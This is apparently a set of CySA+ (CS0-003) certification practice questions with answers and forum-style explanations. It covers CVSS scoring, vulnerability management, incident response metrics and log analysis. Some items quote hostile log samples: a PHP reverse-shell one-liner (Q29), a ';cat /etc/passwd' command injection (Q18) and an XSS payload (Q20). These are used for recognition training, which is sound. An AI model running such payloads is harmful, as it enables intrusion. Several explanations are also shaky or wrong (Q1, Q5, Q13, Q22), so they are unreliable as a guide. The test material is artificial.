CYAC+ 003 - questions

Question 1

A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrity but not to availability. Which of the following CVE metrics would be most accurate for this zero-day threat?

A. CVSS:31/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:K/A:L
B. CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
C. CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
D. CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H

Answer 1

The answer is A

The attack vector is network (AV:N), the attack complexity is low (AC:L), no privileges are required (PR:N), no user interaction is required (UI:N), the scope is unchanged (S:U), the confidentiality and integrity impacts are high (C:H/I:H), and the availability impact is low (A:L).

The value “K” for Integrity (I) does not exist. It might be typo.

Reference:
https://www.first.org/cvss/calculator/3.1

Question 2

Which of the following items should be included in a vulnerability scan report? (Choose two.)

A. Lessons learned
B. Service-level agreement
C. Playbook
D. Affected hosts
E. Risk score
F. Education plan

Answer 2

Selected Answer: DE
Correct - From CertMaster:

Vulnerability Report Content
The report should detail identified vulnerabilities, such as missing patches, incorrect configuration settings, and weak passwords, and include the following:

Details regarding the type of vulnerability
- The number of instances
- The affected systems
- The risk levels
- Recommendations

Question 3

The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization?

A. A mean time to remediate of 30 days
B. A mean time to detect of 45 days
C. A mean time to respond of 15 days
D. Third-party application testing

Answer 3

Selected Answer: A
In summary, the correct answer is “30 days average time to remediate” because it focuses on the time frame for effective application of fixes and patches, which is critical to cybersecurity, rather than just the initial response to an alert. This helps ensure that vulnerabilities are patched in a timely manner and reduces exposure to security risks.

Question 4

he security team reviews a web server for XSS and runs the following Nmap scan:

Which of the following most accurately describes the result of the scan?

A. An output of characters > and “ as the parameters used m the attempt
B. The vulnerable parameter ID http://172.31.15.2/1.php?id-2 and unfiltered characters returned
C. The vulnerable parameter and unfiltered or encoded characters passed > and “ as unsafe
D. The vulnerable parameter and characters > and “ with a reflected XSS attempt

Answer 4

Selected Answer: D
it is mentioned that it is reflected in the output

Question 5

A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?

A. Code analysis
B. Static analysis
C. Reverse engineering
D. Fuzzing

Answer 5

Selected Answer: C
Static analysis is typically done when you have the source code in front of you. This is a precompiled binary, you won’t know its librares, functions, system calls, etc. without reverse engineering of some kind. Typically what you’ll do is put it in some sort of sandbox and see what it beacons, etc. I guess you can call that reverse engineering, so C would be the best answer here.

Question 6

An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?

A. Hard disk
B. Primary boot partition
C. Malicious files
D. Routing table
E. Static IP address

Answer 6

Selected Answer: D

The “Guide to Collecting and Archiving Evidence” (RFC 3227) establishes the following order of volatility

• registers, cache
• routing table, arp cache, process table, kernel statistics, memory
• temporary file systems
• disk
• remote logging and monitoring data that is relevant to the system in question
• physical configuration, network topology
• archival media

Question 7

An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the breach to?

A. PCI Security Standards Council
B. Local law enforcement
C. Federal law enforcement
D. Card issuer

Answer 7

Selected Answer: D
Correct. First to the card issuer.
Under the terms of PCI DSS, an organization that has experienced a breach of customer transactions should report the breach to the card issuer. The card issuer is responsible for authorizing and processing the transactions. The card issuer may have specific reporting requirements and procedures for the organization to follow in the event of a breach.
And to be clear, the card issuer is not VISA or Mastercard or else. It is the bank.

Question 8

Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?

A. Mean time to detect
B. Number of exploits by tactic
C. Alert volume
D. Quantity of intrusion attempts

Answer 8

Selected Answer: A

MTTD is a metric that measures how long it takes to detect a security incident or threat from the time it occurs. It is the best metric for an organization to focus on given recent investments in
SIEM, SOAR, and a ticketing system. MTTD is a metric that measures how long it takes to detect a security
incident or threat from the time it occurs

Question 9

A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temporary files, reflecting the web searches from the user’s workstation, to build the case for the investigation. Which of the following is the best way to ensure that the investigation complies with HR or privacy policies?

A. Create a timeline of events detailing the date stamps, user account hostname and IP information associated with the activities
B. Ensure that the case details do not reflect any user-identifiable information Password protect the evidence and restrict access to personnel related to the investigation
C. Create a code name for the investigation in the ticketing system so that all personnel with access will not be able to easily identify the case as an HR-related investigation
D. Notify the SOC manager for awareness after confirmation that the activity was intentional

Answer 9

Selected Answer: B
Because we are dealing with privacy and HR B is the answer. However, A would be the actual investigation to be submitted, hostname and IP isn’t really a privacy concern on an organizational network.

Question 10

A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process?

A. Testing
B. Implementation
C. Validation
D. Rollback

Answer 10

Selected Answer: C

You test the patch before you apply it, and after you apply it, you validate it. I choose option C. Validation.

Question 11

A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the security program did?

A. Data enrichment
B. Security control plane
C. Threat feed combination
D. Single pane of glass

Answer 11

Selected Answer: D

Single pane of glass is a term used to describe a unified view of a computer network or system. It is a graphical user interface that allows network administrators to manage their entire network from one place. The user interface can include monitoring, configuration, and control of the network, its components, and related services.

By combining all security services into a “single pane of glass,” security teams are better able to identify and respond to threats quickly and effectively. With this approach, security teams can automate workflows, allowing them to focus on responding to threats instead of managing multiple interfaces. It also provides real-time visibility into security incidents and events, simplifying the process of responding to and resolving them. Single Pane of Glass Orchestration is an invaluable tool for improving the efficiency of an organization’s security operations.

Question 12

A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself. Which of the following can the analyst perform to see the entire contents of the downloaded files?

A. Change the display filter to ftp.active.port
B. Change the display filter to tcp.port==20
C. Change the display filter to ftp-data and follow the TCP streams
D. Navigate to the File menu and select FTP from the Export objects option

Answer 12

Selected Answer: C
To see the entire contents of the downloaded files in the FTP session captured in Wireshark, the analyst should perform the following steps:

C. Change the display filter to ftp-data and follow the TCP streams.

By changing the display filter to “ftp-data” and then following the TCP streams, the analyst can access and view the entire data transfer, which includes the contents of the downloaded files. This method allows you to reconstruct and view the files being transferred over FTP

Question 13

An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?

A. Scope
B. Weaponization
C. CVSS
D. Asset value

Answer 13

Selected Answer: B

The most likely factor that an analyst would communicate as the reason for the escalation of a CVE’s vulnerability score from 7.1 to 9.8 due to a widely available exploit being used to deliver ransomware is:

Weaponization in the context of vulnerability assessment and the Common Vulnerability Scoring System (CVSS) refers to the development and availability of tools, exploits, or malware that can take advantage of a vulnerability. When a widely available exploit, such as one used to deliver ransomware, becomes accessible to attackers, it significantly increases the severity of the vulnerability. This is because the exploitability of the vulnerability is heightened, leading to a higher CVSS score.

Question 14

Which of the following is an important aspect that should be included in the lessons-learned step after an incident?

A. Identify any improvements or changes in the incident response plan or procedures
B. Determine if an internal mistake was made and who did it so they do not repeat the error
C. Present all legal evidence collected and turn it over to iaw enforcement
D. Discuss the financial impact of the incident to determine if security controls are well spent

Answer 14

Selected Answer: A

Question 15

Joe, a leading sales person at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer’s customers. However, Joe has not resigned or discussed this with his current supervisor yet. Which of the following would be the best action for the incident response team to recommend?

A. Isolate Joe’s PC from the network
B. Reimage the PC based on standard operating procedures
C. Initiate a remote wipe of Joe’s PC using mobile device management
D. Perform no action until HR or legal counsel advises on next steps

Answer 15

Selected Answer: D

Before any technical actions are taken, it is crucial to involve HR and legal counsel to assess the situation, understand the legal implications of Joe’s actions, and determine the appropriate course of action. This ensures that any response is in compliance with employment laws and company policies.

Question 16

The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks?

A. Reduce the administrator and privileged access accounts
B. Employ a network-based IDS
C. Conduct thorough incident response
D. Enable SSO to enterprise applications

Answer 16

Selected Answer: A

Zero trust is a security framework that assumes that threats exist both inside and outside the network. It emphasizes the principle of “least privilege,” which means that users and systems should only have the minimum level of access necessary to perform their tasks.

Question 17

While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the following steps should be taken next?

A. Shut the network down immediately and call the next person in the chain of command.
B. Determine what attack the odd characters are indicative of.
C. Utilize the correct attack framework and determine what the incident response will consist of.
D. Notify the local law enforcement for incident response.

Answer 17

Selected Answer: B

Do we know what the odd characters are indicative of yet? Is this an attack? We need to investigate and determine if this is an incident first before we consult an attack framework.

Question 18

A zero-day command injection vulnerability was published. A security administrator is analyzing the following logs for evidence of adversaries attempting to exploit the vulnerability:
Which of the following log entries provides evidence of the attempted exploit?

A. Log entry 1
B. Log entry 2
C. Log entry 3
D. Log entry 4

Answer 18

Correct Answer: D

Explanation:
Log entry 4 shows an attempt to exploit the zero-day command injection vulnerability by appending a malicious command (;cat /etc/passwd) to the end of a legitimate request (/cgi-bin/index.cgi?name=John). This command
would try to read the contents of the/etc/passwdfile, which contains user account information, and could lead to further compromise of the system. The other log entries do not show any signs of command injection, as they
do not contain any special characters or commands that could alter the intended behavior of the application. Official
Reference:
https://www.imperva.com/learn/application-security/command-injection/
https://www.zerodayinitiative.com/advisories/published/

Question 19

A cybersecurity team lead is developing metrics to present in the weekly executive briefs. Executives are interested in knowing how long it takes to stop the spread of malware that enters the network. Which of the following metrics should the team lead include in the briefs?

A. Mean time between failures
B. Mean time to detect
C. Mean time to remediate
D. Mean time to contain

Answer 19

Selected Answer: D

Explanation:

Mean time to contain (MTTC) measures the average amount of time it takes to isolate and contain a security incident once it has been detected. It specifically focuses on how long it takes to stop the spread of malware and prevent it from causing further damage within the network.

This metric measures the average time it takes to isolate or contain a security incident after it has been detected. It directly reflects the efficiency of the cybersecurity team in responding to and limiting the impact of security incidents such as malware infections.

Question 20

While reviewing web server logs, a security analyst found the following line:

< IMG SRC=’vbscript:msgbox(“test”)’ >

Which of the following malicious activities was attempted?

A. Command injection
B. XML injection
C. Server-side request forgery
D. Cross-site scripting

Answer 20

Selected Answer: D

The provided line is an example of a cross-site scripting (XSS) attack. In an XSS attack, malicious code is injected into a web application, and when other users view the page containing this code, the injected code is executed in their browsers. In this case, the code attempts to execute a VBScript message box with the text “test”.

Question 21

A security analyst is performing vulnerability scans on the network. The analyst installs a scanner appliance, configures the subnets to scan, and begins the scan of the network. Which of the following would be missing from a scan performed with this configuration?

A. Operating system version
B. Registry key values
C. Open ports
D. IP address

Answer 21

Selected Answer: B

A vulnerability scan performed by a scanner appliance on a network typically focuses on identifying vulnerabilities related to open ports, services, and known software vulnerabilities. It may also gather information about the operating system versions running on target hosts. However, registry key values are specific to Windows operating systems and are not typically part of a standard vulnerability scan. Registry information is typically not directly exposed or accessible via network scanning, so it’s not a common target for such scans.

Question 22

A company is in the process of implementing a vulnerability management program. Which of the following scanning methods should be implemented to minimize the risk of OT/ICS devices malfunctioning due to the vulnerability identification process?

A. Non-credentialed scanning
B. Passive scanning
C. Agent-based scanning
D. Credentialed scanning

Answer 22

Selected Answer: B

OT/ICS (Operational Technology and Industrial Control Systems) are probably really important, so taking it down due to scanning is a bad idea. Passive scanning is the least invasive and is just collecting the packets, but not performing additional analysis on it, which reduces the work capacity on the systems

Passive monitoring relies on capturing information about the network as traffic passes a location on a network link…. Unlike active and router-based monitoring, passive monitoring does not add additional traffic to the network. It also performs after-the- fact analysis, since packets must be captured and analyzed, rather than being recorded in real time as they are sent.

Question 23

A security analyst needs to mitigate a known, exploited vulnerability related to an attack vector that embeds software through the USB interface. Which of the following should the analyst do first?

A. Conduct security awareness training on the risks of using unknown and unencrypted USBs.
B. Write a removable media policy that explains that USBs cannot be connected to a company asset.
C. Check configurations to determine whether USB ports are enabled on company assets.
D. Review logs to see whether this exploitable vulnerability has already impacted the company.

Answer 23

Selected Answer: C
When dealing with a known and exploited vulnerability related to an attack vector that involves embedding software through the USB interface, the primary concern is to immediately stop the active exploitation and prevent further attacks. Given the options provided, the answeer is the best

Check configurations for USB ports (Option C): This is the most immediate action to take. Disabling or securing USB ports on company assets will prevent the attacker from further exploiting the vulnerability through this attack vector. It’s a quick and effective way to mitigate ongoing attacks.

Question 24

A security analyst is validating a particular finding that was reported in a web application vulnerability scan to make sure it is not a false positive. The security analyst uses the snippet below:

Which of the following vulnerability types is the security analyst validating?

A. Directory traversal
B. XSS
C. XXE
D. SSRF

Answer 24

Selected Answer: C
XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application’s processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access.

In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other back-end infrastructure, by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks.

Question 25

An organization was compromised, and the usernames and passwords of all employees were leaked online. Which of the following best describes the remediation that could reduce the impact of this situation?

A. Multifactor authentication
B. Password changes
C. System hardening
D. Password encryption

Answer 25

Selected Answer: A

Multifactor authentication (MFA) is a security method that requires users to provide two or more pieces of evidence to verify their identity, such as a password, a PIN, a fingerprint, or a one-time code. MFA can reduce the impact of a credential leak because even if the attackers have the usernames and passwords of the employees, they would still need another factor to access the organization’s systems and resources. Password changes, system hardening, and password encryption are also good security practices, but they do not address the immediate threat of compromised credentials.
Only the existence of multifactor authentication adds extra protection and ensures that even if the attacker gets a username and password, he cannot access the systems.

Question 26

The email system administrator for an organization configured DKIM signing for all email legitimately sent by the organization. Which of the following would most likely indicate an email is malicious if the company’s domain name is used as both the sender and the recipient?

A. The message fails a DMARC check
B. The sending IP address is the hosting provider
C. The signature does not meet corporate standards
D. The sender and reply address are different

Answer 26

Selected Answer: A

DMARC (Domain-based Message Authentication, Reporting, and Conformance) is an email authentication protocol designed to give email domain owners the ability to protect their domain from unauthorized use, commonly known as email spoofing. A DMARC policy uses both SPF (Sender Policy Framework) and DKIM to validate emails. If an email fails a DMARC check, it means it did not pass SPF or DKIM validation, which is a strong indicator of a malicious or spoofed email, especially if the domain in the sender’s address is being impersonated.

Question 27

The security analyst received the monthly vulnerability report. The following findings were included in the report:

• Five of the systems only required a reboot to finalize the patch application
• Two of the servers are running outdated operating systems and cannot be patched

The analyst determines that the only way to ensure these servers cannot be compromised is to isolate them. Which of the following approaches will best minimize the risk of the outdated servers being compromised?

A. Compensating controls
B. Due diligence
C. Maintenance windows
D. Passive discovery

Answer 27

Selected Answer: A

You have to compromise and meet in the middle sometimes. Compensating controls are the only things that reduce the risk. B, C, D don’t apply in this context. From the Sybex CySA 003 study guide, page 20:

Compensating Controls
In some cases, security professionals may not be able to implement all of the desired security controls due to technical, operational, or financial reasons. For example, an organization may not be able to upgrade the operating system on retail point-of- sale (POS) terminals due to an incompatibility with the POS software. In these cases, security professional should seek out compensating controls designed to provide a similar level of security using alternate means. In the POS example, administrators might place the POS terminals on a segmented, isolated network and use intrusion prevention systems to monitor network traffic for any attempt to exploit an unpatched vulnerability and block it from reaching the vulnerable host. This meets the same objective of protecting the POS terminal from compromise and serves as a compensating control.

Question 28

A cybersecurity analyst is tasked with scanning a web application to understand where the scan will go and whether there are URIs that should be denied access prior to more in-depth scanning. Which of following best fits the type of scanning activity requested?

A. Uncredentialed scan
B. Discovery scan
C. Vulnerability scan
D. Credentialed scan

Answer 28

Selected Answer: B
Correct
A discovery scan is typically used to identify the scope of a web application and understand where the scan will go. This type of scan is often the first step in assessing a web application’s security and helps the analyst determine which areas should be further examined or tested in-depth.

Question 29

While reviewing web server logs, a security analyst discovers the following suspicious line:

php -r ’$socket=fsockopen(“10.0.0.1”, 1234); passthru (“/bin/sh -i <&3 >&3 2>&3”);’

Which of the following is being attempted?

A. Remote file inclusion
B. Command injection
C. Server-side request forgery
D. Reverse shell

Answer 29

Selected Answer: D

The suspicious line of code indicates an attempt to establish a reverse shell connection from the compromised web server to an external IP address (10.0.0.1) and a specific port (1234). This indicates that the attacker is attempting to gain unauthorized remote access to the web server by opening a network socket, executing a shell command (/bin/sh -i), and redirecting the input and output to the network socket.

Don’t pick B, this is clearly a reverse shell attack. ‘fsockopen’ initiates the connection on 10.0.0.1. ‘exec’ function is then used to execute /bin/sh -i <&3 >&3 2>&3, which establishes a command shell on the target machine. /sh -i = reverse shell. Yes they are injecting commands, but the better answer (which is the goal of the attacker) is to create a reverse shell on the victim’s machine

Question 30

When undertaking a cloud migration of multiple SaaS applications, an organization’s systems administrators struggled with the complexity of extending identity and access management to cloud-based assets. Which of the following service models would have reduced the complexity of this project?

A. CASB
B. SASE
C. ZTNA
D. SWG

Answer 30

Selected Answer: C
ZTNA provides secure remote access to applications based on clearly defined access control policies, no matter where the user or the application resides. It can simplify the extension of IAM by ensuring that only authenticated and authorized users and devices are able to access applications and data. ZTNA enforces the principle of least privilege, which is a key component of IAM.

The CASB and SASE are only work with company network. If user access SAAS through Internet directly. CASB and SASE may not work.